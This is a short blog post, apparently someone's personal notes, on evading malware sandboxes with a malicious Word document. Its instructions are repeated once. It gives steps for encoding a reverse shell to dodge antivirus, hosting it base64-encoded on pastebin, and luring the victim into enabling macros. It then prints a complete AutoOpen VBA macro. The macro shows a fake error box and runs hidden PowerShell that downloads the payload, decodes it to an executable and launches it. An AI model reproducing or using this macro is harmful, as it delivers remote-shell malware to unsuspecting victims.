Sandbox Evasion & Document Based Attack
Note to oneself, msgbox is sufficient to break first generation sandboxes. Thank goodness for second generation sandboxes at the CPU level, how's malware going to evade that?
For the test we do a few things!
First you encode your reverse shell umpteen iterations (avoids AV detection), open it in notepad++ and encode it to base64, copy this text and dump it on pastebin. grab the raw url and put it into a word macro like below.
In the document body add some message to enable macro's to decode the content and add some random base64 garbage.
For the test we do a few things!
First you encode your reverse shell umpteen iterations (avoids AV detection), open it in notepad++ and encode it to base64, copy this text and dump it on pastebin. grab the raw url and put it into a word macro like below.
In the document body add some message to enable macro's to decode the content and add some random base64 garbage.
Function myPause() Dim pausetime, start, finish pausetime = 4 start = Timer Do While Timer < start + pausetime DoEvents Loop finish = Timer End Function Sub AutoOpen() MsgBox "Encoding Error, Click OK to continue", vbOKOnly Shell "cmd /K PowerShell.exe $wc = New-Object System.Net.WebClient; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials; $wc.DownloadFile('http://pastebin.com/raw.php?i=base64content','%TEMP%\b64e.txt')", vbHide myPause Shell "cmd /K PowerShell.exe Set-Content -Value ([System.Convert]::FromBase64String((get-content '%TEMP%\b64e.txt'))) -Encoding Byte '%TEMP%\reallybad.exe'", vbHide myPause Shell "start %TEMP%\reallybad.exe;", vbHide End Sub
Comments
Post a Comment